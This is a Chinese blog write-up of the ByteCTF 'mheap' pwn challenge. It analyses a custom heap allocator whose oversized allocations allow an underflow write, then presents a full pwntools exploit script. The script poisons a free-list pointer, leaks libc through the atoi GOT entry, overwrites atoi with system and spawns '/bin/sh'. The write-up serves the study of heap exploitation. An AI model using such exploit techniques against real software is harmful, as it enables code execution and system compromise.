ByteCTF-mheap WP

最新推荐文章于 2022-09-26 23:21:26 发布
最新推荐文章于 2022-09-26 23:21:26 发布
阅读量445 收藏
点赞数
分类专栏: 漏洞挖掘与利用 文章标签: ByteCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41252520/article/details/100881168
版权

保护

在这里插入图片描述

分析

  • 程序首先分配一个 4096 大小的内存,内存基址指定为 0x23330000
    在这里插入图片描述

  • 并自己实现了一套堆分配机制,类似于 fastbin ,通过逆向分析得其结构如下:

      typedef struct Chunk{
  	int Size;
  	Chunk *Fd;
  	Chunk *Bk;
  }

  • 分配大小以 16 字节对齐,并且没有大小限制,导致可以分配超出 0x23331000 的地址。漏洞由此而生,在后面的 read 函数在向非法地址写入数据时就会返回 -1 ,这样就可以向低地址溢出写。
    在这里插入图片描述在这里插入图片描述

  • 可以通过溢出改写 heap_list 中的某一项指向 chunk 结构体(也就是指向 0x00000000004040D0 )。另外,在释放的时候,会将 heap_list 中指定位置的指针减去0x10加入到链表中;在分配的时候,会先遍历队列是否有同样大小的指针,有则返回这个指针加上0x10。
    在这里插入图片描述
    在这里插入图片描述

  • 首先分配一个非常大的chunk0,再申请一个小的chunk1,这个小的chunk1就是我们要溢出修改的,注意此时并没有超出 0x23331000

  • 然后释放掉小的chunk1,使其进入链表。

  • 申请一个大的chunk2,超出 0x23331000

  • 编辑chunk2,将溢出修改chunk1的FD指针为chunk结构体指针。

  • 以上过程的写法:

      heap_list=0x00000000004040E0
  prev_chunk_list=0x00000000004040D0
  atoi_got=elf.got['atoi']
  Add(0,0xfb0,'\xaa'*0x20+'\n')
  Add(1,0x10,'\xbb'*0x10)
  Del(1)
  Add(2,0x40,p64(prev_chunk_list)+'\x00'*0x2f+'\n')

  • 此时内存布局如下:
    在这里插入图片描述

  • 可见 chunk1.Fd已被篡改为指向chunk的结构体指针,只要再申请 0x23330fc0-0x10 大小的chunk即可得到 0x4040e0 地址,就可以泄露内存和任意地址写了。

  • 后续写法:

    Add(3,0x0000000023330fc0-0x10,p64(atoi_got)+’\n’)

  • 此时内存布局:
    在这里插入图片描述

完整EXP

from pwn import*

#context.log_level='debug'
p=process('./mheap')
elf=ELF('./mheap',checksec=False)
libc=elf.libc

def Add(idx,size,data):
    p.sendlineafter('choice: ','1')
    p.sendlineafter('Index: ',str(idx))
    p.sendlineafter('size: ',str(size))
    p.sendafter('Content: ',data)

def Del(idx):
    p.sendlineafter('choice: ','3')
    p.sendlineafter('Index: ',str(idx))

def Show(idx):
    p.sendlineafter('choice: ','2')
    p.sendlineafter('Index: ',str(idx))

def Edit(idx,data):
    p.sendlineafter('choice: ','4')
    p.sendlineafter('Index: ',str(idx))
    p.send(data)

heap_list=0x00000000004040E0
prev_chunk_list=0x00000000004040D0
atoi_got=elf.got['atoi']
Add(0,0xfb0,'\xaa'*0x20+'\n')
Add(1,0x10,'\xbb'*0x10)
Del(1)
Add(2,0x40,p64(prev_chunk_list)+'\x00'*0x2f+'\n')
Add(3,0x0000000023330fc0-0x10,p64(atoi_got)+'\n')
Show(0)
libc_addr=u64(p.recv(6).ljust(8,'\0'))-libc.sym['atoi']
system=libc.sym['system']+libc_addr
success('libc_addr:'+hex(libc_addr))
success('system:'+hex(system))
Edit(0,p64(system))
p.sendline('/bin/sh')

p.interactive()

总结

  • read 函数写入非法地址时会返回 -1 ,但是程序并不会 crash
飞鸿踏雪(蓝屏选手)
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
all-in-one-wp-migration-file-extension.zip
04-07
all-in-one-migration的扩展插件,可以备份更大内存的wordpress站点,500m
CTF题解NO.00005】ByteCTF2020 - pwn - write up by arttnba3
arttnba3的博客
01-19 725
github pages address 【CTF题解NO.00005】ByteCTF2020 - pwn - write up by arttnba3[github pages address](https://arttnba3.cn/2020/11/23/CTF-0X01-ByteCTF2020-pwn/)0x00.绪论0x01.线上赛 - CTF -PWN0x00.easy_heap - null by any address + tcache poisoning漏洞:任意地址写00x01.gun
VPP源码----mheap结构学习
轻飘飞扬
03-04 1504
1、系统malloc和mmap对比 malloc使用brk分配的内存,需要等到高地址内存释放以后才能释放,申请大内存(大于128k)时候使用的是mmap系统调用; mmap系统调用是在堆和栈之间分配一块内存,这块内存可以单独释放,不会造成内存“空洞”,也不会影响到堆顶内存的缩减释放。 mmap的缺点是按需调页:一页大小4k bytes,如果需要的内存很小,会造成内存浪费;频繁的mmap、munma...
1. VPP源码分析(内存管理之mheap
weixin_34345753的博客
04-15 774
1.1. mheap 1.1.1. mheap_t first_free_elt_uoffset_by_bin: User offsets for head of doubly-linked list of free objects of this size. non_empty_free_elt_heads: Bitmap of non-emp...
图解Go内存分配器
cpongo011702
06-08 167
内存分配器一直是性能优化的重头戏,其结构复杂、内容抽象,涉及的数据结构繁多,相信很多人都曾被它搞疯了。本文将从内存的基本知识入手,到一般的内存分配器,进而延伸到Go内存分配器,对其进行全方位深层次的讲解,希望能让你对进程内存管理有一个全新的认识。物理内存 VS 虚拟内存在研究内存分配器之前,让我们先看一下物理内存和虚拟内存的背景知识。剧透一下,内存分配器实际上操作的不是物理内存而是虚拟内存。物理内...
golang内存管理简介
农家小舍
02-09 2464
go runtime抛弃了传统的内存分配方式,改为自主管理。其内存分配算法主要源自 Google为C语言开发的TCMalloc算法。其核心思想是把内存分为多级管理,从而降低锁的粒度。
all-in-one-wp-migration:多合一WP迁移-无限制importexport
04-09
多合一WP迁移 无限导入/导出All In One WP迁移版本6.77 学分 马里奥·马尔科维奇(Mario Markovic)
All-in-One WP Migration 插件
12-03
All-in-One WP Migration 插件,优点是所有数据能够全部导入导出,包括文章、图片、插件、主题等等一切数据。
wp-script-core
09-07
wp-script-core wp-script-core wp的一个插件 喜欢的可以下载
wp-statistics
06-01
WORDPRESS Statistics 文件 解压可用 可以直接解压,然后上传到chrome 插件库,
ByteCTF 2021(Crypto部分)
m0_57291352的博客
10-24 687
easyxor 核心加密算法convert就是四个shift,写个逆就行,flag被分为两部分,前半部分用OFB模式加密,后半部分用CBC模式加密,由于CBC模式的缺陷,当我们只考虑最后一块时,将倒数第二块作为iv,凭借flag的格式做判断即可爆破出key,再利用OFB模式的漏洞,结合key与已知的flag格式即可逆推出iv,此时iv和key尽知,直接解密即可 from Crypto.Util.number import bytes_to_long, long_to_bytes from random im
[ByteCTF2020]WP兼个人笔记总结
Y4tacker的博客
10-29 4266
文章目录前言Wallbreaker 2020douyin_video(攻破中)参考链接 前言 这是我第一次参加的比赛,两天时间一道题都没做出来,害有点小难受,希望能够将WP记录好,方便以后的复习查阅 Wallbreaker 2020 官方的预期解还没有出来难受,期待决赛后出预期解!!! 一开始我自己打开题目发现看起来不是特别难的亚子,首先查看了phpinfo, 接下来我进入了蚁剑,但是发现除了html目录下可读,tmp目录下可读可写, 然后我想到了利用glob进行文件的读取http://123.57.9
编程狂人|Go内存管理一文足矣
Q54665642ljf的博客
08-03 287
最早学习C、C++语言时,它们都是把内存的管理全部交给开发者,这种方式最灵活但是也最容易出问题,对人员要求极高;后来出现的一些高级语言像Java、JavaScript、C#、Go,都有语言自身解决了内存分配和回收问题,降低开发门槛,释放生产力。然而对于想要深入理解原理的同学来说却带来了负担,本篇文章主要从内存分配角度来梳理个人理解,后续文章中会介绍Go的垃圾回收机制。...
【pwn】2019Byte ctf 复现
weixin_43960998的博客
07-07 447
1、mulnote 看 wp 说加了 ollvm 混淆,不过影响不大, 存在 uaf,libc 2.23,double free 梭了。 from pwn import * import sys binary = "./pwn" context.log_level = "debug" context.binary = binary context.arch = "amd64" elf = ELF(binary) local = 1 if local: p = process(binary)
ByteCTF_2019&XNUCA_2019部分web题复现
Lethe's Blog
09-11 4538
EzCMS 1、扫描目录有www.zip,下载得到源码。 整个题目的功能如下: index.php页面验证登陆,可以任意账号登陆到upload.php上传页面,但是只有admin账号才能进行文件上传。 访问了upload.php·,就会在沙盒下生成一个.htaccess文件,内容为:lolololol, i control all。 上传文件后,会返回文件的存储路径,view details可以...
bytectf部分wp
weixin_44255856的博客
09-10 988
boring_code 拿到源码 <?php function is_valid_url($url) { if (filter_var($url, FILTER_VALIDATE_URL)) { if (preg_match('/data:\/\//i', $url)) { return false; } ret...
2020ByteCTF——WriteUp
weixin_44503995的博客
10-29 1613
2020ByteCTF——WriteUp 2020bytectf 官方部分wp https://github.com/ctfwiki/ctf_game_history/blob/master/2020/ByteCTF.md ctf大佬个人补充wp https://bytectf.feishu.cn/docs/doccnqzpGCWH1hkDf5ljGdjOJYg 请保持自己的决心!
Bytectf-几道web总结
weixin_30376453的博客
09-21 723
1.EZcms 这道题思路挺明确,给了源码,考点就是md5哈希扩展+phar反序列化 首先这道题会在上传的文件目录下生成无效的.htaccess,从而导致无法执行上传的webshell,所以就需要想办法删除掉.htaccess 这里主要记录一点,利用php内置类进行文件操作, exp为: <?php class File{ public $filename...
ByteCTF 2022】Crypto Writeup
u010883831的博客
09-26 672
ByteCTF 2022 密码 Crypto writeup Choose_U_flag Compare Card Shark
--wp--preset--color--black:这是什么
最新发布
07-12
`--wp--preset--color--black` 是一个以双短横线开头的 CSS 自定义属性(CSS Custom Property)。 这个属性看起来是一个特定于某个平台或框架的命名约定,其中 `wp` 可能代表 WordPress,`preset` 可能代表预设,`...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值